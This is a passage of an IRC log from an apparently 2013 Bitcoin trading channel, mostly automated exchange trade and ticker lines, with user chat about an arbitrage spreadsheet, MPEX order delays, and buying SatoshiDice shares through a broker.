getting satoshidice counts, and mtgox, bitcoincentral and bitcoin24 Feb 01 14:19:52 in addition to ALL market data from bitcoincharts Feb 01 14:19:58 see the link for examples Feb 01 14:21:00 should not be hard to build an arbitrage table using googlefinance("currency:USDEUR") functions along with this stuff Feb 01 14:22:18 if you just want the code, wait for it to show up in the gallery, or just tell me your gmail addr and ill share it Feb 01 14:22:22 would be happy if others want to modify Feb 01 14:27:09 mpex is f'd up? Feb 01 14:29:11 mircea_popescu Is there something wrong with STAT or ordering? I place orders that the system accepts but they are not show in the STAT. Feb 01 14:30:58 [BTCTC] [B.YABMC] 12 @ 0.0239 = 0.2868 BTC [+] Feb 01 14:31:41 okay the google code from before i think you can add to an existing spreadsheet even before it shows up in the gallery by going to "manage libraries" within your own spreadsheets script code and add the library using key "Mn6asBLgiBkIwY9lK-po6dDe4GsftYgT-" Feb 01 14:31:55 aaaanyway Feb 01 14:32:29 [BTCTC] [B.YABMC] 100 @ 0.024 = 2.4 BTC [+] Feb 01 14:34:42 [BTCTC] [B.YABMC] 10 @ 0.025 = 0.25 BTC [+] Feb 01 14:37:35 bitcoin price collapsing, no way to trade options :( Feb 01 14:38:47 ;; ticker Feb 01 14:38:48 BTCUSD ticker | Best bid: 20.47489, Best ask: 20.63189, Bid-ask spread: 0.15700, Last trade: 20.47489, 24 hour volume: 86995.67904068, 24 hour low: 20.30000, 24 hour high: 21.43000, 24 hour vwap: 20.81855 Feb 01 14:39:39 it looks awfully stable... for bitcoin Feb 01 14:45:09 [HAVELOCK] [SDICE] 6 @ 0.78 = 4.68 BTC [+] Feb 01 14:48:24 Bugpowder: so Bitcoin is still above $20, how is it collapsing? (caveat time==now) Feb 01 14:50:34 3000bt sold in 5 minutes I felt powerless and vulnerable. Feb 01 14:51:30 I just want to be able to place orders Feb 01 15:06:42 ;; ticker Feb 01 15:06:43 BTCUSD ticker | Best bid: 20.75001, Best ask: 20.78562, Bid-ask spread: 0.03561, Last trade: 20.70001, 24 hour volume: 84892.49229867, 24 hour low: 20.30000, 24 hour high: 21.43000, 24 hour vwap: 20.82657 Feb 01 15:07:38 So... Shit is pretty much where it has been for the past few hours... Maybe a bit higher... Feb 01 15:10:16 [MPEX] [S.MPOE] 4321 @ 0.00065366 = 2.8245 BTC [-] Feb 01 15:10:18 [MPEX] [S.MPOE] 3829 @ 0.00065331 = 2.5015 BTC [-] Feb 01 15:10:19 [MPEX] [S.MPOE] 10209 @ 0.00065331 = 6.6696 BTC [-] Feb 01 15:10:21 [MPEX] [S.MPOE] 1791 @ 0.00065178 = 1.1673 BTC [-] Feb 01 15:10:21 [MPEX] [S.MPOE] 3256 @ 0.00066397 = 2.1619 BTC [+] Feb 01 15:10:22 [MPEX] [S.MPOE] 10688 @ 0.00066617 = 7.12 BTC [+] Feb 01 15:10:23 [MPEX] [S.MPOE] 1156 @ 0.0006675 = 0.7716 BTC [+] Feb 01 15:10:25 [MPEX] [S.MPOE] 14713 @ 0.0006675 = 9.8209 BTC [+] Feb 01 15:10:26 [MPEX] [S.MPOE] 837 @ 0.00066945 = 0.5603 BTC [+] Feb 01 15:10:27 [MPEX] [S.DICE] 470 @ 0.00721406 = 3.3906 BTC [-] Feb 01 15:10:28 [MPEX] [S.DICE] 401 @ 0.00717339 = 2.8765 BTC [-] Feb 01 15:10:29 [MPEX] [S.DICE] 170 @ 0.00714749 = 1.2151 BTC [-] Feb 01 15:10:31 [MPEX] [S.MPOE] 3900 @ 0.00066945 = 2.6109 BTC [+] Feb 01 15:10:32 [MPEX] [S.MPOE] 1446 @ 0.00066945 = 0.968 BTC [+] Feb 01 15:10:33 [MPEX] [S.MPOE] 4400 @ 0.00066952 = 2.9459 BTC [+] Feb 01 15:10:33 [MPEX] [S.MPOE] 3900 @ 0.00067101 = 2.6169 BTC [+] Feb 01 15:10:34 [MPEX] [S.MPOE] 1620 @ 0.00067171 = 1.0882 BTC [+] Feb 01 15:10:35 [MPEX] [S.MPOE] 12200 @ 0.00066424 = 8.1037 BTC [-] Feb 01 15:10:36 [MPEX] [S.MPOE] 6700 @ 0.00066294 = 4.4417 BTC [-] Feb 01 15:10:38 [MPEX] [S.DICE] 2000 @ 0.00732394 = 14.6479 BTC [+] Feb 01 15:10:39 [MPEX] [S.MPOE] 7800 @ 0.00066294 = 5.1709 BTC [-] Feb 01 15:10:40 [MPEX] [S.MPOE] 3200 @ 0.00066294 = 2.1214 BTC [-] Feb 01 15:10:41 [MPEX] [S.MPOE] 31009 @ 0.00065178 = 20.211 BTC [-] Feb 01 15:10:42 [MPEX] [S.MPOE] 141 @ 0.00065091 = 0.0918 BTC [-] Feb 01 15:10:43 [MPEX] [S.MPOE] 10469 @ 0.00067154 = 7.0304 BTC [+] Feb 01 15:10:43 [MPEX] [S.MPOE] 3069 @ 0.00067171 = 2.0615 BTC [+] Feb 01 15:10:44 [MPEX] [S.DICE] 873 @ 0.00714749 = 6.2398 BTC [-] Feb 01 15:10:46 [MPEX] [S.MPOE] 8211 @ 0.00067171 = 5.5154 BTC [+] Feb 01 15:10:47 [MPEX] [S.MPOE] 12312 @ 0.00067379 = 8.2957 BTC [+] Feb 01 15:10:48 [MPEX] [S.MPOE] 7100 @ 0.00067379 = 4.7839 BTC [+] Feb 01 15:10:49 [MPEX] [S.DICE] 400 @ 0.00727162 = 2.9086 BTC [+] Feb 01 15:10:50 [MPEX] [S.MPOE] 7200 @ 0.00065264 = 4.699 BTC [-] Feb 01 15:10:51 [MPEX] [S.MPOE] 7900 @ 0.00065091 = 5.1422 BTC [-] Feb 01 15:10:52 [MPEX] [S.MPOE] 56500 @ 0.00067379 = 38.0691 BTC [+] Feb 01 15:10:53 [MPEX] [S.DICE] 1150 @ 0.00732394 = 8.4225 BTC [+] Feb 01 15:10:53 [MPEX] [S.MPOE] 12250 @ 0.00065819 = 8.0628 BTC [-] Feb 01 15:10:54 [MPEX] [S.MPOE] 300 @ 0.00065378 = 0.1961 BTC [-] Feb 01 15:10:55 [MPEX] [S.MPOE] 9900 @ 0.00066845 = 6.6177 BTC [+] Feb 01 15:10:57 [MPEX] [S.MPOE] 8338 @ 0.00067379 = 5.6181 BTC [+] Feb 01 15:10:58 [MPEX] [S.MPOE] 9950 @ 0.0006765 = 6.7312 BTC [+] Feb 01 15:10:59 [MPEX] [S.MPOE] 6122 @ 0.0006775 = 4.1477 BTC [+] Feb 01 15:11:00 [MPEX] [S.MPOE] 1350 @ 0.00066845 = 0.9024 BTC [-] Feb 01 15:11:01 [MPEX] [S.MPOE] 7300 @ 0.00065226 = 4.7615 BTC [-] Feb 01 15:11:02 [MPEX] [S.MPOE] 14100 @ 0.00067135 = 9.466 BTC [+] Feb 01 15:11:03 [MPEX] [S.MPOE] 5550 @ 0.0006775 = 3.7601 BTC [+] Feb 01 15:11:04 [MPEX] [S.DICE] 7 @ 0.00730193 = 0.0511 BTC [-] Feb 01 15:11:04 [MPEX] [S.DICE] 1730 @ 0.00730193 = 12.6323 BTC [-] Feb 01 15:11:05 [MPEX] [S.DICE] 63 @ 0.00730193 = 0.46 BTC [-] Feb 01 15:11:06 [MPEX] [S.DICE] 390 @ 0.00732394 = 2.8563 BTC [+] Feb 01 15:12:46 [MPEX] [S.DICE] 540 @ 0.00732394 = 3.9549 BTC [+] Feb 01 15:12:47 [MPEX] [S.DICE] 160 @ 0.00727162 = 1.1635 BTC [-] Feb 01 15:14:34 So... I'm new to this shit. Is this channel always as boring as shit when mircea_popescu is away? Feb 01 15:23:15 ;; ticker Feb 01 15:23:16 BTCUSD ticker | Best bid: 20.78501, Best ask: 20.80000, Bid-ask spread: 0.01499, Last trade: 20.79901, 24 hour volume: 82265.45116399, 24 hour low: 20.30000, 24 hour high: 21.43000, 24 hour vwap: 20.83914 Feb 01 15:24:02 [MPEX] [S.MPOE] 2578 @ 0.0006775 = 1.7466 BTC [+] Feb 01 15:24:04 [MPEX] [S.MPOE] 422 @ 0.00067806 = 0.2861 BTC [+] Feb 01 15:24:55 I name you Draco Malfoy >> I have long blond hair and a beard. I'm not telling you guys my gender, though. Feb 01 15:33:09 damning with praise --> Hopefully he does the right thing and for his credit he has givin us zero indication that he does not have full intention of doing the right thing. Feb 01 15:34:39 we can discuss how np-hard is mpex order/trade/matching Feb 01 15:34:52 but perhaps you'llbe bored Feb 01 15:35:34 for a " specialized devision[sic] of a huge corporate electronics manufacturer in Canada." Feb 01 15:35:42 oh god I've read the rest https://www.bitcoinasic.net/ Feb 01 15:36:05 has tom passed his madness to someone else? Feb 01 15:36:22 jurov: can it be made turing complete? Feb 01 15:37:08 lol Feb 01 15:37:36 We currently have a full functioning and hashing prototype which we plan to bring to production next week. Feb 01 15:38:22 but they will include 25 FPGA hard copy ASICS Feb 01 15:38:29 maybe i'll have to reserve the right to change last digit of price on coinbr orders so that shit can work better Feb 01 15:39:32 [MPEX] [S.DICE] 600 @ 0.0073446 = 4.4068 BTC [+] Feb 01 15:39:37 or use mechanical turk, lol Feb 01 15:40:27 "gauranteed" Feb 01 15:42:10 [HAVELOCK] [HIM] 1 @ 13.8 BTC [+] Feb 01 15:45:09 [HAVELOCK] [SDICE] 10 @ 0.78 = 7.8 BTC [+] Feb 01 15:52:41 ;; ticker Feb 01 15:52:42 BTCUSD ticker | Best bid: 20.74000, Best ask: 20.75000, Bid-ask spread: 0.01000, Last trade: 20.75000, 24 hour volume: 81257.48105440, 24 hour low: 20.30000, 24 hour high: 21.43000, 24 hour vwap: 20.84567 Feb 01 15:53:10 That spread closed up awfully tight Feb 01 15:53:23 [MPEX] [S.MPOE] 3899 @ 0.00067806 = 2.6438 BTC [+] Feb 01 15:53:24 [MPEX] [S.MPOE] 4321 @ 0.00067806 = 2.9299 BTC [+] Feb 01 15:53:26 [MPEX] [S.MPOE] 8735 @ 0.00067807 = 5.9229 BTC [+] Feb 01 15:53:33 [BTCTC] [COGNITIVE] 4 @ 0.2401 = 0.9604 BTC [-] Feb 01 15:56:43 yeah Feb 01 15:56:48 panic averted Feb 01 15:57:42 mpex works again Feb 01 16:02:11 bleh, im not sure what is with google but... made a simple abitrage spreadsheet based on the Bitcoin Utilities google app I mentioned before. You can view it without a google account but apparently if you want to update the table you have to login with your google account. https://docs.google.com/spreadsheet/ccc?key=0AguYZ5-dWMgfdElhakdHQzhiQXp5emctdjZTNG9qaEE&usp=sharing#gid=0 It should then show you a BTC / Update menu. If it doesnt, go Feb 01 16:02:46 ;; ticker Feb 01 16:02:47 BTCUSD ticker | Best bid: 20.66118, Best ask: 20.79999, Bid-ask spread: 0.13881, Last trade: 20.66118, 24 hour volume: 80274.16082626, 24 hour low: 20.35000, 24 hour high: 21.43000, 24 hour vwap: 20.85245 Feb 01 16:04:09 the table doesnt take into account volume and the likes, yet Feb 01 16:04:20 take into account fees? Feb 01 16:04:29 also btc-e? Feb 01 16:04:29 that either. not hard to add at some point Feb 01 16:04:31 working on it Feb 01 16:04:39 markedathome: ill add it Feb 01 16:05:02 [BTCTC] [GSDPT] 200 @ 0.0074 = 1.48 BTC [+] Feb 01 16:05:18 [MPEX] [S.MPOE] 4321 @ 0.0006738 = 2.9115 BTC [-] Feb 01 16:05:20 [MPEX] [S.MPOE] 14729 @ 0.00067355 = 9.9207 BTC [-] Feb 01 16:07:09 did you see www.nyse-group.de/bitcoin-arbitrage when it was around? http://www.bitcoinmoney.com/post/7000316379/arbitrage-opportunities-view Feb 01 16:08:43 no i didnt Feb 01 16:08:45 [MPEX] [S.MPOE] 3755 @ 0.00067807 = 2.5462 BTC [+] Feb 01 16:08:46 [MPEX] [S.MPOE] 4321 @ 0.00067818 = 2.9304 BTC [+] Feb 01 16:08:48 aaah. yeah i saw that Feb 01 16:08:48 [MPEX] [S.MPOE] 9024 @ 0.00067819 = 6.12 BTC [+] Feb 01 16:08:58 there are a couple of other abitrage tables that are public Feb 01 16:09:06 somehow im getting close to the idea of google being the bot Feb 01 16:09:19 [MPEX] [S.DICE] 345 @ 0.00727162 = 2.5087 BTC [-] Feb 01 16:09:21 [MPEX] [S.DICE] 457 @ 0.00714749 = 3.2664 BTC [-] Feb 01 16:09:22 [MPEX] [S.DICE] 98 @ 0.00711968 = 0.6977 BTC [-] Feb 01 16:09:31 grab a spreadsheet, give it your api keys and just keep your USD/EUR/GBP accounts up Feb 01 16:09:59 would have to take into account volume and fees though Feb 01 16:12:59 [MPEX] [S.MPOE] 3821 @ 0.00067355 = 2.5736 BTC [-] Feb 01 16:13:01 [MPEX] [S.MPOE] 4321 @ 0.00067272 = 2.9068 BTC [-] Feb 01 16:13:02 [MPEX] [S.MPOE] 3754 @ 0.00067271 = 2.5254 BTC [-] Feb 01 16:18:45 [MPEX] [S.MPOE] 21600 @ 0.00067271 = 14.5305 BTC [-] Feb 01 16:23:27 here's a new one I didn't see on bitcoincharts yesterday https://www.libertybit.com Feb 01 16:23:46 [MPEX] [S.DICE] 300 @ 0.0072832 = 2.185 BTC [+] Feb 01 16:23:54 [MPEX] [S.MPOE] 1723 @ 0.00067271 = 1.1591 BTC [-] Feb 01 16:23:56 [MPEX] [S.MPOE] 1600 @ 0.00067135 = 1.0742 BTC [-] Feb 01 16:23:57 [MPEX] [S.MPOE] 17100 @ 0.00066925 = 11.4442 BTC [-] Feb 01 16:23:58 [MPEX] [S.MPOE] 473 @ 0.00066617 = 0.3151 BTC [-] Feb 01 16:23:59 [MPEX] [S.MPOE] 2204 @ 0.00066382 = 1.4631 BTC [-] Feb 01 16:32:49 markedathome: i added btc-e to the abitrage google table Feb 01 16:33:11 [HAVELOCK] [SDICE] 1 @ 0.845 BTC [+] Feb 01 16:34:10 [HAVELOCK] [SDICE] 26 @ 0.86 = 22.36 BTC [+] Feb 01 16:38:57 ;; ticker Feb 01 16:38:58 BTCUSD ticker | Best bid: 20.78000, Best ask: 20.79000, Bid-ask spread: 0.01000, Last trade: 20.78000, 24 hour volume: 79739.64954537, 24 hour low: 20.40000, 24 hour high: 21.43000, 24 hour vwap: 20.85572 Feb 01 16:47:38 [MPEX] [S.MPOE] 4321 @ 0.00067784 = 2.9289 BTC [+] Feb 01 16:47:39 [MPEX] [S.MPOE] 16976 @ 0.00067819 = 11.513 BTC [+] Feb 01 16:47:41 [MPEX] [S.MPOE] 3853 @ 0.00067843 = 2.614 BTC [+] Feb 01 16:51:11 [HAVELOCK] [SDICE] 1 @ 0.89 BTC [+] Feb 01 16:52:08 markedathome: updated google abitrate table to highlight those with possitive arbitrage percentiles. https://docs.google.com/spreadsheet/ccc?key=0AguYZ5-dWMgfdElhakdHQzhiQXp5emctdjZTNG9qaEE&usp=sharing Feb 01 16:55:10 [MPEX] [S.DICE] 766 @ 0.0072832 = 5.5789 BTC [+] Feb 01 16:55:12 [MPEX] [S.DICE] 50 @ 0.0073446 = 0.3672 BTC [+] Feb 01 16:55:13 [MPEX] [S.DICE] 1144 @ 0.00734501 = 8.4027 BTC [+] Feb 01 16:55:14 [MPEX] [S.DICE] 3162 @ 0.00735013 = 23.2411 BTC [+] Feb 01 16:55:16 [MPEX] [S.DICE] 500 @ 0.00736106 = 3.6805 BTC [+] Feb 01 16:55:18 [MPEX] [S.DICE] 2878 @ 0.00737252 = 21.2181 BTC [+] Feb 01 16:56:10 [HAVELOCK] [SDICE] 1 @ 0.89 BTC [+] Feb 01 16:56:12 [HAVELOCK] [SDICE] 3 @ 0.89 = 2.67 BTC [+] Feb 01 16:56:18 [MPEX] [S.MPOE] 4321 @ 0.00067818 = 2.9304 BTC [-] Feb 01 16:56:20 [MPEX] [S.MPOE] 6736 @ 0.00067843 = 4.5699 BTC [+] Feb 01 16:56:21 [MPEX] [S.MPOE] 9900 @ 0.00067844 = 6.7166 BTC [+] Feb 01 16:56:22 [MPEX] [S.MPOE] 89 @ 0.00067984 = 0.0605 BTC [+] Feb 01 16:56:25 still, you wont see the BTC / Update menu to update the values uourself unless you have a google account Feb 01 16:59:10 [HAVELOCK] [SDICE] 18 @ 0.7801 = 14.0418 BTC [-] Feb 01 16:59:11 [HAVELOCK] [SDICE] 10 @ 0.75 = 7.5 BTC [-] Feb 01 17:02:11 [HAVELOCK] [SDICE] 5 @ 0.75 = 3.75 BTC [-] Feb 01 17:02:31 [BTCTC] [ESECURITYSABTC] 1 @ 0.82 BTC [+] Feb 01 17:02:42 [MPEX] [S.DICE] 2800 @ 0.00737252 = 20.6431 BTC [+] Feb 01 17:02:43 [MPEX] [S.MPOE] 19265 @ 0.00067984 = 13.0971 BTC [+] Feb 01 17:02:45 [MPEX] [S.MPOE] 3535 @ 0.00068019 = 2.4045 BTC [+] Feb 01 17:07:46 okay now the google abitrage table updates every minute Feb 01 17:08:11 [HAVELOCK] [SDICE] 2 @ 0.75 = 1.5 BTC [-] Feb 01 17:08:53 for now Feb 01 17:10:45 [MPEX] [S.MPOE] 2673 @ 0.00067512 = 1.8046 BTC [-] Feb 01 17:13:11 [HAVELOCK] [SDICE] 8 @ 0.745 = 5.96 BTC [-] Feb 01 17:15:39 [MPEX] [S.MPOE] 1515 @ 0.00068019 = 1.0305 BTC [+] Feb 01 17:15:41 [MPEX] [S.MPOE] 17285 @ 0.00068053 = 11.763 BTC [+] Feb 01 17:15:54 what's new Feb 01 17:16:32 [MPEX] [S.MPOE] 14000 @ 0.00068018 = 9.5225 BTC [-] Feb 01 17:16:34 [MPEX] [S.MPOE] 6713 @ 0.00068053 = 4.5684 BTC [+] Feb 01 17:16:35 [MPEX] [S.MPOE] 4650 @ 0.00068078 = 3.1656 BTC [+] Feb 01 17:16:36 [MPEX] [S.MPOE] 21200 @ 0.00068151 = 14.448 BTC [+] Feb 01 17:16:38 [MPEX] [S.MPOE] 12850 @ 0.00068184 = 8.7616 BTC [+] Feb 01 17:17:16 btcfpga is even more up its own arse than previously thought possible. Feb 01 17:18:16 [MPEX] [S.MPOE] 1648 @ 0.00067512 = 1.1126 BTC [-] Feb 01 17:18:17 [MPEX] [S.MPOE] 14550 @ 0.00067509 = 9.8226 BTC [-] Feb 01 17:18:19 [MPEX] [S.MPOE] 19352 @ 0.0006645 = 12.8594 BTC [-] Feb 01 17:18:24 [BTCTC] [MININGCO.ETF] 1 @ 0.5 BTC [-] Feb 01 17:19:39 [MPEX] [S.MPOE] 4321 @ 0.00068157 = 2.9451 BTC [+] Feb 01 17:19:40 [MPEX] [S.MPOE] 2029 @ 0.00068184 = 1.3835 BTC [+] Feb 01 17:22:43 markedathome how could that be Feb 01 17:23:23 read for yourself - https://www.bitcoinasic.net/ Feb 01 17:24:42 [MPEX] [S.DICE] 4322 @ 0.00737252 = 31.864 BTC [+] Feb 01 17:24:43 [MPEX] [S.DICE] 6000 @ 0.007375 = 44.25 BTC [+] Feb 01 17:24:44 [MPEX] [S.DICE] 3350 @ 0.00737717 = 24.7135 BTC [+] Feb 01 17:24:45 [MPEX] [S.DICE] 1328 @ 0.0073786 = 9.7988 BTC [+] Feb 01 17:25:10 [HAVELOCK] [SDICE] 15 @ 0.75 = 11.25 BTC [+] Feb 01 17:26:13 [BTCTC] [GSDPT] 100 @ 0.007 = 0.7 BTC [-] Feb 01 17:26:15 [BTCTC] [GSDPT] 2547 @ 0.0074 = 18.8478 BTC [+] Feb 01 17:26:16 [BTCTC] [GSDPT] 7454 @ 0.0075 = 55.905 BTC [+] Feb 01 17:29:11 [HAVELOCK] [SDICE] 14 @ 0.75 = 10.5 BTC [+] Feb 01 17:30:47 [MPEX] [S.MPOE] 17200 @ 0.00067443 = 11.6002 BTC [-] Feb 01 17:33:06 [MPEX] [S.MPOE] 4321 @ 0.00067938 = 2.9356 BTC [+] Feb 01 17:33:08 [MPEX] [S.MPOE] 9279 @ 0.00067925 = 6.3028 BTC [-] Feb 01 17:34:02 [MPEX] [S.MPOE] 4321 @ 0.00068163 = 2.9453 BTC [+] Feb 01 17:34:03 anyone talked with tytus from the forums? Feb 01 17:34:04 [MPEX] [S.MPOE] 6821 @ 0.00068184 = 4.6508 BTC [+] Feb 01 17:34:05 [MPEX] [S.MPOE] 8608 @ 0.00068212 = 5.8717 BTC [+] Feb 01 17:34:14 when does the s.dice dividend get paid ? Feb 01 17:35:46 any time now Feb 01 17:35:49 could be tonight Feb 01 17:35:54 could be in a few days Feb 01 17:36:05 erik will make an annoucement soon I bet Feb 01 17:36:29 last month it was the night of the first. Feb 01 17:36:45 but previous months as late as the 6th Feb 01 17:36:58 cool Feb 01 17:38:11 [HAVELOCK] [SDICE] 14 @ 0.75 = 10.5 BTC [+] Feb 01 17:38:44 hi everyone! Feb 01 17:38:46 :) Feb 01 17:39:59 hihi Feb 01 17:41:13 I am all synced and Erik was online latest yesterday evening, so he's not traveling Feb 01 17:41:18 so it should be sometime within 12 hours Feb 01 17:43:11 there his is! Feb 01 17:45:23 [MPEX] [S.MPOE] 3016 @ 0.00068212 = 2.0573 BTC [+] Feb 01 17:45:24 [MPEX] [S.MPOE] 5900 @ 0.00068225 = 4.0253 BTC [+] Feb 01 17:45:26 [MPEX] [S.MPOE] 2700 @ 0.00068225 = 1.8421 BTC [+] Feb 01 17:45:27 [MPEX] [S.MPOE] 7000 @ 0.00068249 = 4.7774 BTC [+] Feb 01 17:45:28 [MPEX] [S.MPOE] 6050 @ 0.00068261 = 4.1298 BTC [+] Feb 01 17:45:28 [MPEX] [S.MPOE] 34 @ 0.00068261 = 0.0232 BTC [+] Feb 01 17:46:18 hey! Feb 01 17:46:43 [BTCTC] [GSDPT] 400 @ 0.008 = 3.2 BTC [+] Feb 01 17:46:50 what's new jurov? Feb 01 17:47:10 coinbr got two factor auth Feb 01 17:47:19 hmmm i gotta check that out Feb 01 17:47:28 for withdrawals Feb 01 17:47:31 i'm in the process of setting up an ING direct account Feb 01 17:47:41 I wanted to use bitfloor Feb 01 17:48:00 any advice in that regard? Feb 01 17:48:26 mp said that they had a big issue...but other people said that they acknowledge that, but they still get money in and out Feb 01 17:48:34 and i got a new record delay for mpex order surfacing.... amost one and half hour after placing three ordes surfaced and caused havoc Feb 01 17:48:39 either way, i don't want to withdraw cash just BTC Feb 01 17:49:23 ;; ticker Feb 01 17:49:24 BTCUSD ticker | Best bid: 20.80000, Best ask: 20.80999, Bid-ask spread: 0.00999, Last trade: 20.80000, 24 hour volume: 71274.08274542, 24 hour low: 20.40000, 24 hour high: 21.43000, 24 hour vwap: 20.84875 Feb 01 17:49:26 wait that is crazy Feb 01 17:49:34 what happened with mpex? Feb 01 17:49:59 [BTCTC] [RSM] 1 @ 0.009 BTC [-] Feb 01 17:50:07 yeah Feb 01 17:50:16 It fucked up my options bot too Feb 01 17:50:43 ? Feb 01 17:50:55 It said it accepted orders, but they did not show up in STAT or the main book Feb 01 17:51:01 oh Feb 01 17:51:07 [MPEX] [S.MPOE] 7100 @ 0.00068261 = 4.8465 BTC [+] Feb 01 17:51:09 then an hour later, they all showed up Feb 01 17:51:43 nice.... thru 20.80, now for 20.81 to fall Feb 01 17:52:02 yeah that sucks Feb 01 17:52:09 quick question Feb 01 17:52:19 i really want to buy sdice shares Feb 01 17:52:26 but how does that work? Feb 01 17:52:46 how are shares transferred about? Feb 01 17:53:10 [MPEX] [S.DICE] 130 @ 0.00721182 = 0.9375 BTC [-] Feb 01 17:53:22 mjr_, via coinbr you mean? Feb 01 17:54:02 yeah coinbr.com would be your best bet to start Feb 01 17:54:13 they are listed on mpex.co Feb 01 17:54:21 ok thanks Feb 01 17:54:28 i am watching them on mpex Feb 01 17:54:34 but i meant, ok i send bitcoins Feb 01 17:54:41 how do i receive shares? Feb 01 17:54:48 [MPEX] [S.MPOE] 10166 @ 0.00068261 = 6.9394 BTC [+] Feb 01 17:54:50 [MPEX] [S.MPOE] 5984 @ 0.00068325 = 4.0886 BTC [+] Feb 01 17:54:53 you have an mpex account? Feb 01 17:54:59 no Feb 01 17:55:04 i want to eventually Feb 01 17:55:11 but for now i will go through one of the brokers i guess Feb 01 17:55:11 [HAVELOCK] [HIM] 1 @ 13.7 BTC [-] Feb 01 17:55:15 an mpex account is 30 btc, you can use coinbr instead Feb 01 17:55:27 jurov runs coinbr.com Feb 01 17:55:27 yeah i am gonna start that way Feb 01 17:55:36 he can help you out ;) Feb 01 17:56:04 mjr_: use coinbr until you have more intense needs (api access or automated trading or just have enough btc invested you'd rather be closer to the exchange) Feb 01 17:56:14 [MPEX] [S.MPOE] 4147 @ 0.00067925 = 2.8168 BTC [-] Feb 01 17:56:40 yeah, coinbr looks awesome for my needs Feb 01 17:56:52 but again...how do i know i have the shares etc? Feb 01 17:57:07 it just shows up on your account Feb 01 17:57:11 [HAVELOCK] [HIM] 1 @ 13.6 BTC [-] Feb 01 17:57:17 well jurov/coinbr holds the shares for you, but they will show in your account Feb 01 17:57:17 you'll see the buy and sell go from coinbr onto mpex instantly Feb 01 17:57:32 but yeah, basically coinbr owns your shares Feb 01 17:57:40 or manages them for you Feb 01 17:57:47 ah ok, so technically the shares are in coinbr's name... Feb 01 17:57:57 makes sense, and thats fine Feb 01 17:58:04 [BTCTC] [SYNERGY] 1 @ 0.101 BTC [-] Feb 01 17:58:06 [BTCTC] [SYNERGY] 1 @ 0.1001 BTC [-] Feb 01 17:58:07 that is how it usually works Feb 01 17:58:14 i can't wait to do this... Feb 01 17:58:17 well Feb 01 17:58:21 does anyone here own sdice? Feb 01 17:58:27 if you want to get the dividend you shouldn't wait Feb 01 17:58:37 how often are dividends Feb 01 17:58:40 does anyone here NOT own sdice Feb 01 17:58:44 lol Feb 01 17:58:47 dividends are monthly Feb 01 17:58:51 ah ok Feb 01 17:58:53 and probably are coming today Feb 01 17:59:01 so not that big of a deal if i wait till next month Feb 01 17:59:03 [BTCTC] [LTC-MINING] 1 @ 0.3501 BTC [-] Feb 01 17:59:11 [HAVELOCK] [HIM] 1 @ 13.5 BTC [-] Feb 01 17:59:16 wait...they don't tell you when? AND you can buy the shares on the day of and still get in? Feb 01 17:59:27 well Feb 01 17:59:32 you can watch the performance all month Feb 01 17:59:58 usually there is a date on which all owners of the stock get paid their dividend...but you can't just buy it the day before and get it Feb 01 18:00:00 so that is cool Feb 01 18:00:10 20,067.37 in profit this month Feb 01 18:00:22 !ticker m s.dice Feb 01 18:00:24 [MPEX:S.DICE] 1D: 0.00651702 / 0.00715008 / 0.0073786 (74563 shares, 533.13 BTC), 7D: 0.00534524 / 0.00722914 / 0.0075 (632931 shares, 4,575.55 BTC), 30D: 0.00085848 / 0.00479708 / 0.0075 (6535153 shares, 31,349.67 BTC) Feb 01 18:00:24 that is denominated in btc right? Feb 01 18:00:30 yah Feb 01 18:00:44 about 2.9% dividend at current prices. Feb 01 18:01:00 https://docs.google.com/spreadsheet/ccc?key=0Aiec3-Eo_yO5dG5SQklHZG4wRm1GMW9DRWpMMW5UQkE#gid=10 Feb 01 18:01:06 yeah i have that up Feb 01 18:01:11 but it lists like 80% Feb 01 18:01:16 which seemed weird Feb 01 18:01:31 look at the january 2013 sheet Feb 01 18:01:34 that is the revelant data Feb 01 18:02:11 ;;calc 2000 / 10000000 Feb 01 18:02:11 0.0002 Feb 01 18:02:17 .0002 / share Feb 01 18:02:25 why did you use that big number? Feb 01 18:02:40 10 million shares are on mpex Feb 01 18:02:47 if profits are 2000 Feb 01 18:02:57 oh that must be the volume then right? Feb 01 18:03:07 10% of float = 10 million, dividend goes to all shares Feb 01 18:03:08 where it says 74563 Feb 01 18:03:14 wat? Feb 01 18:03:33 assbot just gave out the info on sdice Feb 01 18:03:44 1d 7d 30d Feb 01 18:03:55 current ask is .00721 Feb 01 18:04:14 ;;calc 2000/10000000/.00721 Feb 01 18:04:14 0.0277392510402 Feb 01 18:04:25 2.774 % dividend at current ask Feb 01 18:04:34 thanks Feb 01 18:04:37 still pretty sweet Feb 01 18:04:44 and that is monthly Feb 01 18:05:14 so the first page was probably talking about annualized yield assuming a much cheaper price Feb 01 18:05:21 is that right? Feb 01 18:05:47 yeah Feb 01 18:05:49 the IPO price Feb 01 18:06:24 [MPEX] [S.MPOE] 8426 @ 0.00066543 = 5.6069 BTC [-] Feb 01 18:06:33 i'm loving this Feb 01 18:06:42 if only it wasn't so hard to get bitcoins Feb 01 18:06:46 S.DICE has a profit of 1000 for Feb. Feb 01 18:06:53 wow Feb 01 18:06:56 its the first day Feb 01 18:07:36 i know its obviously anonymous, but is there any info on where the primary demographic is located? Feb 01 18:08:06 nope Feb 01 18:08:26 is there any info besides the financials that we can look at? Feb 01 18:08:34 ie. growth potential Feb 01 18:08:57 how do people find out about it, and is there any effort to get the word out to more people...just curious right now how it all works Feb 01 18:09:02 this is a good place to start Feb 01 18:09:02 https://bitcointalk.org/index.php?topic=80312.800 Feb 01 18:09:18 or ask this guy "Guest38514 has changed nick to evoorhees" Feb 01 18:09:57 mjr_ we don't even know how many ppl use bitcoins. or at least how many actually own 1BTC or more Feb 01 18:09:59 lol, yeah i know it's his company Feb 01 18:10:15 yeah, but i believe...and i could be wrong Feb 01 18:10:21 that you could see the ip address sending Feb 01 18:10:45 and at that point it is trivial to make broad strokes guesses about what region most traffic comes from Feb 01 18:10:53 obviously some may use tor Feb 01 18:10:55 [MPEX] [S.MPOE] 4321 @ 0.00066452 = 2.8714 BTC [-] Feb 01 18:10:57 [MPEX] [S.MPOE] 10000 @ 0.00066451 = 6.6451 BTC [-] Feb 01 18:10:57 which may skew the results Feb 01 18:10:58 [MPEX] [S.MPOE] 4224 @ 0.0006645 = 2.8068 BTC [-] Feb 01 18:10:58 you mean on blockchain.info? that is only ip where that site got it from Feb 01 18:11:22 huh? i mean in order to send a bitcoin, is there not any ip info? Feb 01 18:11:30 yes there is some statistic about number of live nodes... but it decresases despite users' count obviously increases Feb 01 18:11:38 [MPEX] [S.DICE] 400 @ 0.00721182 = 2.8847 BTC [-] Feb 01 18:11:45 cause many users use shared wallets Feb 01 18:11:49 good point Feb 01 18:12:12 many of the 